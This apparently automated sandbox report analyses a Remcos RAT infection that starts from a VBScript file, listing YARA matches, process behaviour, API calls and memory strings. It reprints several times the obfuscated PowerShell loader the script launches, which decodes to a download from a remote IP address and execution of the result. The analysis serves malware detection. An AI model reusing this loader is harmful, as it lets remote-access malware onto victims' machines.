                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,23_2_00406DFC
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,23_2_00406E9F
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 24_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,24_2_004068B5
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 24_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,24_2_004072B5

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2530030312.000000000327F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2549178536.0000000008B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7732, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: amsi32_7368.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 720, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7368, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Very long command line found
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9731
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 9731
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9731Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 9731Jump to behavior
                Wscript starts Powershell (via cmd or directly)
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess Stats: CPU usage > 49%
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,20_2_0040DD85
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00401806 NtdllDefWindowProc_W,20_2_00401806
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_004018C0 NtdllDefWindowProc_W,20_2_004018C0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_004016FD NtdllDefWindowProc_A,23_2_004016FD
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_004017B7 NtdllDefWindowProc_A,23_2_004017B7
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 24_2_00402CAC NtdllDefWindowProc_A,24_2_00402CAC
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 24_2_00402D66 NtdllDefWindowProc_A,24_2_00402D66
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAACCBB0F62_2_00007FFAACCBB0F6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAACCBBEA22_2_00007FFAACCBBEA2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0300F1F014_2_0300F1F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0300FAC014_2_0300FAC0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0300EEA814_2_0300EEA8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0300B76814_2_0300B768
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_2457B5C117_2_2457B5C1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_2458719417_2_24587194
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0044B04020_2_0044B040
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0043610D20_2_0043610D
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0044731020_2_00447310
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0044A49020_2_0044A490
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0040755A20_2_0040755A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0043C56020_2_0043C560
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0044B61020_2_0044B610
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0044D6C020_2_0044D6C0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_004476F020_2_004476F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0044B87020_2_0044B870
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0044081D20_2_0044081D
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0041495720_2_00414957
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_004079EE20_2_004079EE
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00407AEB20_2_00407AEB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0044AA8020_2_0044AA80
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00412AA920_2_00412AA9
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00404B7420_2_00404B74
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00404B0320_2_00404B03
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0044BBD820_2_0044BBD8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00404BE520_2_00404BE5
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00404C7620_2_00404C76
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00415CFE20_2_00415CFE
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00416D7220_2_00416D72
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00446D3020_2_00446D30
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00446D8B20_2_00446D8B
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00406E8F20_2_00406E8F
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_0040503823_2_00405038
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_0041208C23_2_0041208C
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_004050A923_2_004050A9
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_0040511A23_2_0040511A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_0043C13A23_2_0043C13A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_004051AB23_2_004051AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_0044930023_2_00449300
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_0040D32223_2_0040D322
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_0044A4F023_2_0044A4F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_0043A5AB23_2_0043A5AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_0041363123_2_00413631
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_0044669023_2_00446690
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_0044A73023_2_0044A730
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_004398D823_2_004398D8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_004498E023_2_004498E0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_0044A88623_2_0044A886
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_0043DA0923_2_0043DA09
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_00438D5E23_2_00438D5E
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_00449ED023_2_00449ED0
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_0041FE8323_2_0041FE83
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_00430F5423_2_00430F54
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 24_2_004050C224_2_004050C2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 24_2_004014AB24_2_004014AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 24_2_0040513324_2_00405133
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 24_2_004051A424_2_004051A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 24_2_0040124624_2_00401246
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 24_2_0040CA4624_2_0040CA46
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 24_2_0040523524_2_00405235
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 24_2_004032C824_2_004032C8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 24_2_0040168924_2_00401689
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 24_2_00402F6024_2_00402F60
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00444B5A appears 37 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00413025 appears 79 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
                Source: SOA.vbsInitial sample: Strings found which are bigger than 50
                Source: amsi32_7368.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 720, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7368, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E80742000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1870759337.0000019E804B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1979668960.0000019E90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1716933830.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1714276170.0000000004A2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Sarcophilus (Brassart ' Ulykke$ Abiot,gTeksto lBef eaaoElengefbBi,leduaForbruglBobinen:StikbreCvalu,arhPseudomaBew.ylel Ad,omsyPicud.vbP,lygyneKnoldbra Sexdign magere Hou,emo=Rationa Se.lout$ BondabRKontorleRie anngKlejnmaiRoentgeo Dy,kognEndocriaN nsynolaztecaniExpansisDemonstt Endetai teeplecSchizot[Con.ubs$CentuplRJebatseePe erbfgfe,esnoiFrida eoHomogranK.rtarmaT mpetelOsseousiKlinik,s Rotorst DissekiBasilisc Vizard. BlterncParisonoMispropufolletanincr tot Trad t-Festeri2Unprovi]Interco ')
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E804B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Ulykke$ Abiot,gTeksto lBef eaaoElengefbBi,leduaForbruglBobinen:StikbreCvalu,arhPseudomaBew.ylel Ad,omsyPicud.vbP,lygyneKnoldbra Sexdign magere Hou,emo=Rationa Se.lout$ BondabRKontorleRie anngKlejnmaiRoentgeo Dy,kognEndocriaN nsynolaztecaniExpansisDemonstt Endetai teeplecSchizot[Con.ubs$CentuplRJebatseePe erbfgfe,esnoiFrida eoHomogranK.rtarmaT mpetelOsseousiKlinik,s Rotorst DissekiBasilisc Vizard. BlterncParisonoMispropufolletanincr tot Trad t-Festeri2Unprovi]Interco X
                Source: powershell.exe, 0000000E.00000002.1714276170.0000000004A2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Ulykke$ Abiot,gTeksto lBef eaaoElengefbBi,leduaForbruglBobinen:StikbreCvalu,arhPseudomaBew.ylel Ad,omsyPicud.vbP,lygyneKnoldbra Sexdign magere Hou,emo=Rationa Se.lout$ BondabRKontorleRie anngKlejnmaiRoentgeo Dy,kognEndocriaN nsynolaztecaniExpansisDemonstt Endetai teeplecSchizot[Con.ubs$CentuplRJebatseePe erbfgfe,esnoiFrida eoHomogranK.rtarmaT mpetelOsseousiKlinik,s Rotorst DissekiBasilisc Vizard. BlterncParisonoMispropufolletanincr tot Trad t-Festeri2Unprovi]Interco
                Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winVBS@22/13@1/3
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,20_2_004182CE
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 24_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,24_2_00410DE1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,20_2_00418758
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,20_2_00413D4C
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,20_2_0040B58D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Appelmulighed.BesJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_03
                Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-VEYV6I
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lzzt3u25.jkb.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=720
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7368
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: wab.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: wab.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: wab.exe, 00000011.00000002.2561134247.00000000249C0000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: wab.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: wab.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: wab.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: wab.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_23-33247
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.
